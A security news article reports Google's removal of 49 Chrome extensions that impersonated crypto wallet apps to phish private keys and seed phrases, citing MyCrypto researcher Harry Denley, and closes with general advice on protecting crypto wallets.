Malicious code was identified in 49 Chrome Extensions available in the Chrome Web Store. These malicious chrome extensions were being used by attackers to steal Crypto Wallet keys before they were removed from Google’s online store.
49 Chrome Extensions Culled
Google removed 49 Chrome extensions from its Chrome Web Store because they contained malicious code. These malicious Chrome extensions mimicked real cryptocurrency wallet apps to steal the private keys to users’ crypto wallets. It is not the first time that Google culls malicious extensions from its Chrome Web Store. In February Google removed over 500 extensions from its online store.
The malicious Chrome extensions were discovered by security researchers at MyCrypto, an IT service management company in the cryptocurrency space. Harry Denley, Director of Security at MyCrypto explained in a blog post published yesterday: “Essentially, the extensions are phishing for secrets – mnemonic phrases, private keys, and keystore files. Once the user has entered them, the extension sends an HTTP POST request to its backend, where the bad actors receive the secrets and empty the accounts.”
The malicious extensions functioned almost identically to the real crypto wallet apps they were mimicking. However, information entered by victims to access existing crypto wallets or to configure new wallets, was being sent to Google Form or the attackers’ own servers instead of the legitimate apps. The researchers discovered that although 14 different servers were involved, all these appeared to belong to the same attacker(s). Furthermore, research indicated that the attackers were possibly located in Russia.
Crypto Wallets Targeted
The malicious Chrome extensions mimicked the crypto wallet apps belonging to Ledger, Trezor, Jaxx, Electrum, MyEtherWallet, MetaMask, Exodus, and KeepKey. Strangely, however, the attacker did not take funds from victims’ wallets immediately after receiving the stolen keys. As reported by ZDNet, apparently Denley thinks the attackers were only interested in stealing funds from high-value accounts. The other possible explanation provided by Denley is that the attacker hadn’t discovered how to automate the thefts and therefore needed to access each account manually.
Unfortunately, crypto wallets are vulnerable to attack and do not come with insurance. Consequently, it is difficult for victims to recover the funds once they have been stolen. The best would be to prevent funds from being stolen in the first place by using strong passwords and two-factor authentication. It is also important that the latest app updates are applied to ensure that the wallets are kept safe.
Another safety option is to not store all cryptocurrency in one wallet. It may be best to spread the risk. A further option is using cold wallets instead of hot wallets. Hot wallets are connected to the internet whereas cold wallets are not. Thus, hot wallets are more susceptible to hackers.